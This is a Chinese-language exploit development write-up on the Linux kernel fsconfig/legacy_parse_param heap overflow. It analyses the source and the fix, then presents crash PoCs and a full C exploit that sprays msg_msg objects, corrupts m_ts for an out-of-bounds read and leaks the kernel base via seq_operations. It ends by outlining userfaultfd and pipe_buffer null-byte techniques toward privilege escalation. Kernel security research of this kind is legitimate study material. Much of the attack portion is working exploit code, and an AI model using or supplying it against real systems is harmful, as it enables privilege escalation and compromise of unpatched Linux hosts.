static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
        struct legacy_fs_context *ctx = fc->fs_private;         //初始化时为zalloc分配的一段堆空间
        unsigned int size = ctx->data_size;                 //第一次调用的时候，size应该还是0
        size_t len = 0;
        int ret;

在我们一开始分配fscontext的时候，会调用legacy_init_fs_context函数，他会将我们的fc->fs_private分配一个填充0的堆块，然后该代码就是将其堆块赋值给ctx字段，然后赋值其中的size，注意在我们第一次调用到该函数的时候，其都为0

step2

switch (param->type) {
        case fs_value_is_string:
                len = 1 + param->size;                         //len被赋值为1+（_value）的长度
                fallthrough;

        ...

        }

        if (len > PAGE_SIZE - 2 - size)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");

这里我将多余代码去除，可以看到len被赋值为我们之前传入的_value值的大小+1，然后之后就有一个判断，但是这里的判断是存在漏洞的

因为len的类型为size_t, size的类型同样也是unsigned int,因此如果说我们的size+2>PAGE_SIZE的话，右边就会出现一个极大的数，然后我们的len长度就可以任意覆盖且绕过判断，具体有啥用处我们之后再详细讲解

step3

        if (strchr(param->key, ',') ||
            (param->type == fs_value_is_string &&
             memchr(param->string, ',', param->size)))
                return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
                              param->key);
        if (!ctx->legacy_data) {
                ctx->legacy_data = kmalloc(PAGE_SIZE, GFP_KERNEL);
                if (!ctx->legacy_data)
                        return -ENOMEM;
        }

其中第一个if判断我们传入的key是否包含,，或value当中是否包含,,然后如果咱们是第一次调用该函数，那么legacy_data应该为0，所以这里会调用我们的kmalloc，并从kmalloc-4k当中取。

step4

        ctx->legacy_data[size++] = ',';
        len = strlen(param->key);
        memcpy(ctx->legacy_data + size, param->key, len);
        size += len;
        if (param->type == fs_value_is_string) {
                ctx->legacy_data[size++] = '=';
                memcpy(ctx->legacy_data + size, param->string, param->size);
                size += param->size;
        }
        ctx->legacy_data[size] = '\0';
        ctx->data_size = size;
        ctx->param_type = LEGACY_FS_INDIVIDUAL_PARAMS;
        return 0;
}

这里就是拷贝我们的ctx之中缓冲区的过程，其中ctx->legacy_data应该是这种情况

{,key_0=value_0,key_1=value_1,......\0}

修改这个ctx实际上就是修改我们(struct legacy_fs_context)fc->fs_private的过程

该bug自从v5.1_rc1就开始出现，其中的修复也十分简单，仅仅是将其中的减法替换为加法，这样就不会存在溢出的情况

diff --git a/fs/fs_context.c b/fs/fs_context.c
index de1985eae..a195e516f 100644
--- a/fs/fs_context.c
+++ b/fs/fs_context.c
@@ -548,7 +548,7 @@ static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
                              param->key);
        }

-       if (len > PAGE_SIZE - 2 - size)
+       if (size + len + 2 > PAGE_SIZE)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");
        if (strchr(param->key, ',') ||

2.漏洞触发poc编写

这里先给出洞主的poc

#define _GNU_SOURCE
#include <sys/syscall.h>
#include <stdio.h>
#include <stdlib.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif
#define FSCONFIG_SET_STRING 1
#define fsopen(name, flags) syscall(__NR_fsopen, name, flags)
#define fsconfig(fd, cmd, key, value, aux) syscall(__NR_fsconfig, fd, cmd, key, value, aux)

int main(void)
{
        char* val = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        int fd = 0;
        fd = fsopen("9p", 0);
        if (fd < 0) {
                puts("Opening");
                exit(-1);
        }
        for (int i = 0; i < 5000; i++) {
                fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);
        }
        return 0;
}

这里最初发现无法触发漏洞，但是willsroot本人所说是“reliably”

经过打印调试:dog:,发现返回值为-1，到源码里面发现是在这一步进行了返回

而网上搜寻资料得知，ns_capable()负责主体(进程)和客体(资源)的capability进行校验

/**
 * ns_capable - Determine if the current task has a superior capability in effect
 * @ns:  The usernamespace we want the capability in
 * @cap: The capability to be tested for
 *
 * Return true if the current task has the given superior capability currently
 * available for use, false if not.
 *
 * This sets PF_SUPERPRIV on the task if the capability is available on the
 * assumption that it's about to be used.
 */
 bool ns_capable(struct user_namespace *ns, int cap)
{
        return ns_capable_common(ns, cap, CAP_OPT_NONE);
}

这里就是在检查我们的用户命名空间的权限,解决方法截选自arttnba3师傅博客

除此之外willsroot洞主的博客当中也有说明这一点，但就是不知道为啥在作者第一个poc当中并未体现

This bug popped up since 5.1-rc1. It’s important to note that you need the CAP_SYS_ADMIN capability to trigger it, but the permission only needs to be granted in the CURRENT NAMESPACE. Most unprivileged users can just unshare(CLONE_NEWNS|CLONE_NEWUSER) (equivalent of the command unshare -Urm) to enter a namespace with the CAP_SYS_ADMIN permission, and abuse the bug from there; this is what makes this such a dangerous vulnerability.

因此我们可以稍微修改一下willsroot师傅的poc即可成功造成kernel panic

首先我们知道了漏洞点，其中我们该如何触发呢，那就是使得我们的size，也就是我们已经写入的大小，但是现在有个问题，如果你任意调用fsconfig的话，或者说你调用fsconfig一直调用一天有可能也触发不了kernel panic

但其实原作者的poc并不是瞎编的，也是通过了一定的计算，我们先来缕一缕

首先我们每次写入的字节数应该是一个,一个=和我们key、value的长度，所以长度应该是length(key)+length(value)+2,并且我们每次需要通过这个检测

        if (len > PAGE_SIZE - 2 - size)
                return invalf(fc, "VFS: Legacy: Cumulative options too large");

所以我们尽量需要满足size在4095,也就是刚好需要填充满整个申请页面才行，不然如果说在之前填入的时候有空闲，那就不会继续写入，被这个检测拦住，所以我们需要刚好规划到4095这个size，下面就是我按照自行理解所写poc

如下：

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif

int fsopen(const char *fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd, 
             const char *key, const void *val, int aux)
{
    return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

int main(void)
{
        int fd = 0;
        char* val = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        unshare(CLONE_NEWNS | CLONE_NEWUSER);
        fd = fsopen("ext4", 0);
        if (fd < 0) {
                puts("Opening");
                exit(-1);
        }
        for (int i = 0; i < 186; i++) {
                fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
        }

        fsconfig(fd, FSCONFIG_SET_STRING, "\x00", "P", 0);
        for(int i = 0; i < 0x4000; i++){
            fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
        }
        return 0;
}

效果展示

经过多次测试，现在的情况算是可以造成内核报错reliably了

四、消息队列

消息队列是进程之间通信的一种方法，基于SystemV模型，其功能原理并不是很难

产生消息并将其写道队列的进程通常被成为发送者，而一个或其他多个进程就被称为接收者，他们均从队列获取信息。每个消息包含消息正文和一个(正)数，该数用来实现在消息队列内实现几种类型的消息。同一编号的消息按照FIFO来处理。此种涉及到的消息队列数据结构在源码中以msg_queue来进行表示

/* one msq_queue structure for each present queue on the system */
struct msg_queue {
        struct kern_ipc_perm q_perm;
        time64_t q_stime;                /* 上一次调用msgsnd发送消息的时间 */
        time64_t q_rtime;                /* 上一次调用msgrcv接收消息的时间 */
        time64_t q_ctime;                /* 上一次修改的时间 */
        unsigned long q_cbytes;                /* 队列上当前字节数 */
        unsigned long q_qnum;                /* 队列中的消息数目 */
        unsigned long q_qbytes;                /* 队列上最大字节数目 */
        struct pid *q_lspid;                /* 上一次调用msgsnd的pid */
        struct pid *q_lrpid;                /* 上一次接收消息的pid */

        struct list_head q_messages;         
        struct list_head q_receivers;
        struct list_head q_senders;
} __randomize_layout;

除开上面注释的部分，还有三个list_head类型的参数，他们分别用来管理睡眠的发送者(q_senders)、接收者(q_receivers)和消息本身(q_messages)

而其中我们的q_messages中的各个消息都封装在一个msg_msg当中

/* one msg_msg structure for each message */
struct msg_msg {
        struct list_head m_list;                         /* 用作与其他msg_msg相链接 */
        long m_type;                                                 /* 消息类型，用于支持前文所描述的消息队列当中不同的消息类型 */
        size_t m_ts;                /* 消息正文长度 */
        struct msg_msgseg *next;          /* 如果保存超过一个内存页的长消息，则需要next */
        void *security;
        /* 接下来是实际的消息 */
};

struct msg_msgseg {
        struct msg_msgseg *next;
        /* 接下来是实际的消息 */
};

msg_msg与user_key_payload相似，都是包含一个固定大小的头结构，剩下的就是消息正文，每个消息都至少分配一个内存页，如下图：

基础数据结构讲完，下面我们就来分析一下消息队列中较为重要的几个系统调用

1.msgsnd

long ksys_msgsnd(int msqid, struct msgbuf __user *msgp, size_t msgsz,
                 int msgflg)
{
        long mtype;

        if (get_user(mtype, &msgp->mtype))
                return -EFAULT;
        return do_msgsnd(msqid, mtype, msgp->mtext, msgsz, msgflg);
}

SYSCALL_DEFINE4(msgsnd, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
                int, msgflg)
{
        return ksys_msgsnd(msqid, msgp, msgsz, msgflg);
}

其中的关键函数为do_msgsnd，接下来我们逐步进行分析

在我们想要发送消息的时候，do_msgsnd会需要为消息创建空间，他调用的这个函数便是load_msg,如下：

static long do_msgsnd(int msqid, long mtype, void __user *mtext,
                size_t msgsz, int msgflg)
{
        struct msg_queue *msq;
        struct msg_msg *msg;
        int err;
        struct ipc_namespace *ns;
        DEFINE_WAKE_Q(wake_q);

        ns = current->nsproxy->ipc_ns;

        if (msgsz > ns->msg_ctlmax || (long) msgsz < 0 || msqid < 0)
                return -EINVAL;
        if (mtype < 1)
                return -EINVAL;

        msg = load_msg(mtext, msgsz);

        ...

而我们load_msg又是会调用alloc_msg来分配

struct msg_msg *load_msg(const void __user *src, size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg *seg;
        int err = -EFAULT;
        size_t alen;

        msg = alloc_msg(len);

        ...

接下来看到alloc_msg函数

#define DATALEN_MSG        ((size_t)PAGE_SIZE-sizeof(struct msg_msg))
#define DATALEN_SEG        ((size_t)PAGE_SIZE-sizeof(struct msg_msgseg))

static struct msg_msg *alloc_msg(size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg **pseg;
        size_t alen;

        alen = min(len, DATALEN_MSG);                 //从len和PAGE_SIZE-sizeof(struct msg_msg)当中取得较小值
        msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
        if (msg == NULL)
                return NULL;

        msg->next = NULL;
        msg->security = NULL;

        len -= alen;
        pseg = &msg->next;
        while (len > 0) {         //说明是较大的消息，所以需要msg_msgseg字段
                struct msg_msgseg *seg;

                cond_resched();

                alen = min(len, DATALEN_SEG);
                seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
                if (seg == NULL)
                        goto out_err;
                *pseg = seg;
                seg->next = NULL;
                pseg = &seg->next;
                len -= alen;
        }

        return msg;

out_err:
        free_msg(msg);
        return NULL;
}

其中通过源码大致可以看出，当分配大于PAGE_SIZE的时候，会额外增加msg_msgseg来存储消息正文，其中分配标志为GFP_KERNEL_ACCOUNT

2.msgrcv

long ksys_msgrcv(int msqid, struct msgbuf __user *msgp, size_t msgsz,
                 long msgtyp, int msgflg)
{
        return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

SYSCALL_DEFINE5(msgrcv, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
                long, msgtyp, int, msgflg)
{
        return ksys_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg);
}

同send一样，他同样是调用do_msgrcv来操作

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
               long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
        int mode;
        struct msg_queue *msq;
        struct ipc_namespace *ns;
        struct msg_msg *msg, *copy = NULL;
        DEFINE_WAKE_Q(wake_q);

        ...

        bufsz = msg_handler(buf, msg, bufsz);
        free_msg(msg);
        return bufsz;
}

最终调用了msg_handler函数指针，这在最开始是传入了do_msg_fill作为函数指针，所以相当于最终调用了do_msg_fill，代码如下：

static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
        struct msgbuf __user *msgp = dest;
        size_t msgsz;

        if (put_user(msg->m_type, &msgp->mtype))
                return -EFAULT;

        msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz;
        if (store_msg(msgp->mtext, msg, msgsz))
                return -EFAULT;
        return msgsz;
}

/* message buffer for msgsnd and msgrcv calls */
struct msgbuf {
        __kernel_long_t mtype;          /* type of message */
        char mtext[1];                  /* message text */
};

其中将我们传入的buf，作为msgbuf结构，然后将其中msgp->mtext作为真正的dest进行拷贝，其中调用strore_msg函数，如下：

int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
        size_t alen;
        struct msg_msgseg *seg;

        alen = min(len, DATALEN_MSG);
        if (copy_to_user(dest, msg + 1, alen))
                return -1;

        for (seg = msg->next; seg != NULL; seg = seg->next) {
                len -= alen;
                dest = (char __user *)dest + alen;
                alen = min(len, DATALEN_SEG);
                if (copy_to_user(dest, seg + 1, alen))
                        return -1;
        }
        return 0;
}

在do_msgrcv当中若msgflg带有MSG_COPY，会走到下面这段函数

static long do_msgrcv(int msqid, void __user *buf, size_t bufsz, long msgtyp, int msgflg,
               long (*msg_handler)(void __user *, struct msg_msg *, size_t))
{
        int mode;
        struct msg_queue *msq;
        struct ipc_namespace *ns;
        struct msg_msg *msg, *copy = NULL;
        DEFINE_WAKE_Q(wake_q);

        ns = current->nsproxy->ipc_ns;

        if (msqid < 0 || (long) bufsz < 0)
                return -EINVAL;

        if (msgflg & MSG_COPY) {
                if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
                        return -EINVAL;
                copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax));
                if (IS_ERR(copy))
                        return PTR_ERR(copy);
        }

        ...

其中会调用prepare_copy函数，如下：

static inline struct msg_msg *prepare_copy(void __user *buf, size_t bufsz)
{
        struct msg_msg *copy;

        /*
         * Create dummy message to copy real message to.
         */
        copy = load_msg(buf, bufsz);
        if (!IS_ERR(copy))
                copy->m_ts = bufsz;
        return copy;
}

这里是拷贝我们的一个预留msg_msg结构体用来存放消息，然后我们回到msgrcv

由于我们假设本次加上了MSG_COPY标志位，那么接下来会进行到下面这段代码

        for (;;) {
                struct msg_receiver msr_d;

                        ...

                        msg = find_msg(msq, &msgtyp, mode);

                        ...

                        /*
                         * If we are copying, then do not unlink message and do
                         * not update queue parameters.
                         */
                        if (msgflg & MSG_COPY) {
                                msg = copy_msg(msg, copy);                         //复制我们的msg,但并不unlink，这里的返回msg是我们的dst，也就是copy这个参数
                                goto out_unlock0;
                        }

                        ...

                }

                ...

out_unlock0:
        ipc_unlock_object(&msq->q_perm);
        wake_up_q(&wake_q);
out_unlock1:
        rcu_read_unlock();
        if (IS_ERR(msg)) {
                free_copy(copy);
                return PTR_ERR(msg);
        }

        bufsz = msg_handler(buf, msg, bufsz);
        free_msg(msg);                 //最后释放copy

        return bufsz;
}

该段函数由于咱们传入的MSG_COPY标志位，导致其中我们接受的消息并不会进行下面的列表unlink操作，而是直接复制到临时msg，然后通过msg_handler（也就是do_msg_fill函数）传入给我们的用户区buf，最后释放掉我们刚刚创建的临时msg

五、漏洞利用

1.基地址泄露

首先我们假设其处于真实环境，所以应开的保护基本都需要开启，目前我们先来解决一下KASLR导致的地址随机化问题

题目中我们需要泄露基地址，我们选用msg_msg搭配seq_operations的手法

我们现在已知的一个溢出为内核堆上的legacy_data后的溢出，因此我们如何利用legacy_data下一页的内容呢？这时我们可以想到使用堆喷的技巧，在这里我们选则使用msg_msg来进行堆喷，其中是因为他大小可控，且若申请大小大于一页，则会额外申请msg_msgseg结构体来继续存储消息，其二是因为他的分配标志为GFP_KERNEL_COUNT,他刚好同之前我们的fsconfig中申请的fc->private，也就是legacy_data相一致，如果此处选用GFP_KERNEL的结构体则会存在隔离情况，这个加上COUNT的标志位一般从kmalloc-cg-*来分配，后面不带COUNT的则从kmalloc-*分配

过程我打算就按照will的wp进行复现，其中的堆喷技巧也值得借鉴

首先我们要知道大致的堆喷范围，这里我们可以使用命令

cat /proc/slabinfo

查看一下自己本机的情况大致了解一下，我本机的内核版本是6.2

由于我们这个属于大块，在分配的时候也是使用kmalloc_large来分配，所以相应的slab也较大，其中objperslab为8，也就是说同一个slab里面有8个这样的obj,所以我们的堆喷范围大概就是在这个范围左右

uint64_t do_leak(){
    uint64_t kernel_base;
    char pat[0x1000] = {0};
    char buffer[0x2000] = {0}, recieved[0x2000] = {0};      //PAGE_SIZE*2
    int targets[0x10] = {0};
    msg* message = (msg* )(buffer); 
    int size = 0x1018;      
    /* msg_msg: (0x30)head, (0xfd0)message_0
     * msg_msgseg: (0x8)head, (0x18)message_1, for kmalloc-32 :)
     * */

    /* spray the msg_msg */
    for(int i = 0; i < 8; i++){
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666|IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);      /* spray the 0x1018 msg_msg from the kmalloc-4k */
    }

我们首先采取堆喷八个msg_msg，但是这里注意我们的消息长度为(0x1018 - 0x30)，这是为了保证我们可以增添一个额外的msgseg,这样可以，这里由于我们是要搭配后来的seq_operations，因此我们特意构造留给msg_msgseg的大小为0x18,也就是总共加上他的头为0x20，这样可以为我们之后的堆喷打基础:)

堆喷过后，我们正常利用fsconfig来构造溢出的临界状态，然后再继续进行堆喷，此处的目的是为了更大概率的使得我们溢出到msg_msg的头部分

    memset(pat, 0x42, sizeof(pat));
    pat[sizeof(pat) - 1] = '\x00';

    info_log("Opening the ext4 filesystem");
    fd = fsopen("ext4", 0);
    if (fd < 0) {
        puts("Opening");
        exit(-1);
    }
    for (int i = 0; i < 186; i++) {
        fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", "P", 0);

 /* overflow, hopefully causes an OOB read on a potential msg_msg object below */
    info_log("Overflowing...");
    pat[21] = '\x00';
    char evil[] = "\x60\x10";
    /* it will write 23(21 + ',' + '=') bytes
     * but the up(4095) reserve '\x00', one byte
     * so this time we overflow 22 byte 
     * */
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);

    // spray more msg_msg
    /* it will spray the legacy data in some one spraying obj 
     * that is because kmalloc-cg-4k from a 8K chunk :)
     * it could include 8 kmalloc-cg-4k
     * we can use cmd [sudo cat /proc/slabinfo] for checking
     * */
    for (int i = 8; i < 0x10; i++) 
    {
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666 | IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);
    }

    info_log("overflow the msg->m_ts");
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", evil, 0);

最后的fsconfig实际上就是在大概率写到msg_msg头部的情况下覆盖msg_msg->m_ts字段，制造出一个大数字的读取,下图就是我们恰好堆喷到我们溢出的部分

下图就是我们最后一次fsconfig的情况

可以看到我们的m_ts字段被修改为了0x1060,这样以来我们就可以越界进行读取，大伙还记得上面额外分配的kmalloc-32吗，接下来就得靠它了，之前顺便堆喷他的原因是为了让我们的seq_operation和他有一定概率出现在同一个slab里面

之后后面的泄露就是寻常化了，直接利用msgrcv系统调用，造成OOB_read，越界读取额外的msg_msgseg相邻的seq_operations函数指针，如下：

struct seq_operations {
        void * (*start) (struct seq_file *m, loff_t *pos);
        void (*stop) (struct seq_file *m, void *v);
        void * (*next) (struct seq_file *m, void *v, loff_t *pos);
        int (*show) (struct seq_file *m, void *v);
};

经过调试过程可得知，该seq_operations->start函数初始化为内核中的single_start函数，这样以来我们就可以实现内核基地址的泄露了

即可成功泄露基地址，但是我目前泄露是失败的，之后再看:(

之后发现这里应该是由于多核心的缘故，导致kmalloc有一定几率转到别的核心CPU上面分配，所以导致的失败，所以这里进行一个简单的绑核即可寻找到固定偏移，如下：（后期考证也发现不绑核也可以成功，但成功率会大大下降，所以这里我们绑核了较好）

下面的泄露poc也进行了相应修改

#define _GNU_SOURCE 
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <linux/mount.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sched.h>

#define IPC_PRIVATE (long)0
#define IPC_CREAT  00001000   /* create if key is nonexistent */
#define IPC_NOWAIT 00004000   /* return error on wait */
#define MSG_NOERROR     010000  /* no error if message is too big */
#define MSG_COPY        040000  /* copy (not remove) all queue messages */
#define SINGLE_START_OFFSET 0x35f200

#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif

#ifndef __NR_msgget
#define __NR_msgget 186
#endif

#ifndef __NR_msgget
#define __NR_msgsnd 189
#endif

#ifndef __NR_msgget
#define __NR_msgrcv 188
#endif

/* to run the exp on the specific core only */
void bind_cpu(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

int fd;                 /* using by filesystem */
typedef struct{
    long mtype;          /* type of message */
        char mtext[1];                  /* message text */

}msg;

#define PRINT_ADDR(str, x) printf("\033[0m\033[1;34m[+]%s \033[0m:0x%lx\n", str, x)
void info_log(char* str){
         printf("\033[0m\033[1;32m[+]%s\033[0m\n",str);
}

void error_log(char* str){
  printf("\033[0m\033[1;31m[-]%s\033[0m\n",str);
  exit(1);
}

long get_msg(int key, int msgflg){
    return msgget(key, msgflg);
}

long send_msg(int msqid, void* msgp, size_t msgsz, int msgflg){

    return msgsnd(msqid, msgp, msgsz, msgflg);
}

long recv_msg(int msqid, void* msgp, size_t msgsz, long msgtyp, int msgflg){
    return msgrcv(msqid, msgp, msgsz, msgtyp, msgflg);
}

int fsopen(const char *fs_name, unsigned int flags)
{
    return syscall(__NR_fsopen, fs_name, flags);
}

int fsconfig(int fsfd, unsigned int cmd, 
             const char *key, const void *val, int aux)
{
    return syscall(__NR_fsconfig, fsfd, cmd, key, val, aux);
}

uint64_t do_check_leak(char *buf) 
{
    uint64_t kbase = ((unsigned long*)buf)[510];
    if(!kbase){
        return 0;
    }   
    kbase -= SINGLE_START_OFFSET; 
    return kbase;
}

uint64_t do_leak(){
    uint64_t kernel_base;
    char pat[0x1000] = {0};
    char buffer[0x2000] = {0}, recieved[0x2000] = {0};      //PAGE_SIZE*2
    int targets[0x10] = {0};
    msg* message = (msg* )(buffer); 
    int size = 0x1018;      
    /* msg_msg: (0x30)head, (0xfd0)message_0
     * msg_msgseg: (0x8)head, (0x18)message_1, for kmalloc-32 :)
     * */

    /* spray the msg_msg */
    for(int i = 0; i < 8; i++){
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666|IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);      /* spray the 0x1018 msg_msg from the kmalloc-4k */
    }

    memset(pat, 0x42, sizeof(pat));
    pat[sizeof(pat) - 1] = '\x00';

    info_log("Opening the ext4 filesystem");
    fd = fsopen("ext4", 0);
    if (fd < 0) {
        puts("Opening");
        exit(-1);
    }
    for (int i = 0; i < 186; i++) {
        fsconfig(fd, FSCONFIG_SET_STRING, "peiwithhao", "peiwithhao", 0);
    }
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", "P", 0);

    /* overflow, hopefully causes an OOB read on a potential msg_msg object below */
    info_log("Overflowing...");
    pat[21] = '\x00';
    char evil[] = "\x60\x10";
    /* it will write 23(21 + ',' + '=') bytes
     * but the up(4095) reserve '\x00', one byte
     * so this time we overflow 22 byte 
     * */
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", pat, 0);

    // spray more msg_msg
    /* it will spray the legacy data in some one spraying obj 
     * that is because kmalloc-cg-4k from a 8K chunk :)
     * it could include 8 kmalloc-cg-4k
     * we can use cmd [sudo cat /proc/slabinfo] for checking
     * */
    for (int i = 8; i < 0x10; i++) 
    {
        memset(buffer, 0x41+i, sizeof(buffer));
        targets[i] = get_msg(IPC_PRIVATE, 0666 | IPC_CREAT);
        send_msg(targets[i], message, size - 0x30, 0);
    }

    info_log("overflow the msg->m_ts");
    fsconfig(fd, FSCONFIG_SET_STRING, "\x00", evil, 0);

    info_log("heap overflow done");
    info_log("Start spraying kmalloc-32 for seq_operations");

    size = 0x1060;
    for(int i = 0; i < 100; i++){
        open("/proc/self/stat", O_RDONLY);
    } 

    info_log("Recieving the leak data...");

    for(int j = 0; j < 0x10; j++){
        recv_msg(targets[j], recieved, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
        kernel_base = do_check_leak(recieved);
        //kernel_base = ((unsigned long *)recieved)[511];
        if(kernel_base){
            PRINT_ADDR("kernel_base", kernel_base);
            close(fd);
            return kernel_base;
        }
    }
    error_log("leak kernel_base failed!");
    return 0;
}

int main(void)
{   
    unshare(CLONE_NEWNS | CLONE_NEWUSER);
    bind_cpu(0);
    do_leak();
    return 0;
}

2.userfaultfd利用

泄露完内核基地址后，我们就该考虑如何进行利用了，这里在读完源码之后可以发现，在我们调用msgsnd的过程中，走到load_msg这样一个函数，会使用copy_from_user来将我们传入的buf传递给创建的msg当中

struct msg_msg *load_msg(const void __user *src, size_t len)
{
        struct msg_msg *msg;
        struct msg_msgseg *seg;
        int err = -EFAULT;
        size_t alen;

        msg = alloc_msg(len);
        if (msg == NULL)
                return ERR_PTR(-ENOMEM);

        alen = min(len, DATALEN_MSG);
        if (copy_from_user(msg + 1, src, alen))                 //这里会访问到我们的 __user *src指针，那么此时可以发动我们的userfaultfd来将其卡在这里
                goto out_err;

        for (seg = msg->next; seg != NULL; seg = seg->next) {
                len -= alen;
                src = (char __user *)src + alen;
                alen = min(len, DATALEN_SEG);
                if (copy_from_user(seg + 1, src, alen))
                        goto out_err;
        }

        err = security_msg_msg_alloc(msg);
        if (err)
                goto out_err;

        return msg;

out_err:
        free_msg(msg);
        return ERR_PTR(err);
}

我们知道，当我们走到load_msg的时候，会首先通过alloc_msg来分配一个msg_msg数据结构，很有可能也包括msg_msgseg，分配好空间返回到load_msg后，则会调用copy_from_user来将我们用户空间的内容复制到msg_msg当中，这时如果我们在分配好空间之后，调用copy_from_user之前将我们分配的msg_msg->next指针修改一下，那么就可以达成一个任意写的功效

需要实现这样时机巧妙的操作，在内核版本5.11以前我们可以利用userfaultfd这样的条件竞争手法

3.空字节堆溢出

该解法甚是巧妙，第一次出现于arttnba3师傅在d3ctf中的出题笔记并被应用到该漏洞之中，该解法既可以在简单的pwn环境下使用，也可以不用考虑到内核5.11后userfaultfd的使用权限问题。且仅需要堆溢出1个空字节即可完成提权。牛牛爆了(bushi

1.初期知识准备

我们该如何使用仅仅一个字节来达成地址泄露甚至说是权限提升呢？这里我们考虑到某些结构体，在不破坏其结构形式的情况下，仅溢出一字节是一个很好的办法，但是介于内核中地址的随机性，我们不如将其定为溢出空字节

如果说这里我们溢出到的某个结构体开头第一个字段为一个指针，那么这样我们就可以修改指针地址，使其指向我们尽可能可以操纵的地区，这里根据博客的提示，我们就可以选用pipe_buffer这个结构体进行利用，他的数据结构如下：

/**
 *        struct pipe_buffer - a linux kernel pipe buffer
 *        @page: the page containing the data for the pipe buffer
 *        @offset: offset of data inside the @page
 *        @len: length of data inside the @page
 *        @ops: operations associated with this buffer. See @pipe_buf_operations.
 *        @flags: pipe buffer flags. See above.
 *        @private: private data owned by the ops.
 **/
struct pipe_buffer {
        struct page *page;
        unsigned int offset, len;
        const struct pipe_buf_operations *ops;
        unsigned int flags;
        unsigned long private;
};

这里简单说一下在本次利用当中较为重要字段的含义

page:该pipe_buffer所容纳内容的页面
offset:该pipe_buffer数据在page页面的偏移，同时也是read系统调用的指针所在
len:该pipe_buffer数据总共的长度，offset+len就是write系统调用的指针所在

可以看到该结构体开头即为struct page的一个指针，且该page结构体大小为0x40字节，其刚好可以被0x100整除（也就是说page结构体指针的低一字节只可能是\x00,\x40,\x80,\xc0），因此我们即可断定在堆喷的情况下，我们可以覆盖某个pipe_buffer的开头低一字节为\x00，来使得他指向某个其他pipe_buffer指向的page结构体，具体情况如下：

上面是初始分配的两个pipe_buffer,接下来我们假定其中一个pipe_buffer的page指针低一子节为\x00（1/4的概率

然后我们利用空字节溢出，将下面低字节非\x00进行溢出

此时即可将两者的指针指向同一个page结构体，然后通过释放其中一个管道来使得构造成页级UAF

但是这里的一个问题就是，pipe_buffer每次调用是从kmalloc-cg-1k进行获取，伙伴系统中则是从order-2当中取得，而我们的legacy_data则是从kmalloc-cg-4k中获取，伙伴系统则是从order-3当中取出，因此我们不能通过寻常的函数获取pipe_buffer,如下：

do_pipe2
        __do_pipe_flags
                create_pipe_files
                        get_pipe_inode                         //对于该管道inode的fops赋值为pipefifo_fops
                                alloc_pipe_info
                                        kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT)
                                        kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT)

该链条会导致pipe_buffer从kmalloc-cg-1k当中获取，其中pipe_bufs在函数开头被指定为一个常数16，且pipe_buffer结构体的大小为0x28,这俩相乘了分配得512<0x280<0x400,因此他会从kmalloc-cg-1k、order-2当中取得

所以这里我们考虑其他的方式来修改我们pipe_buffer的大小

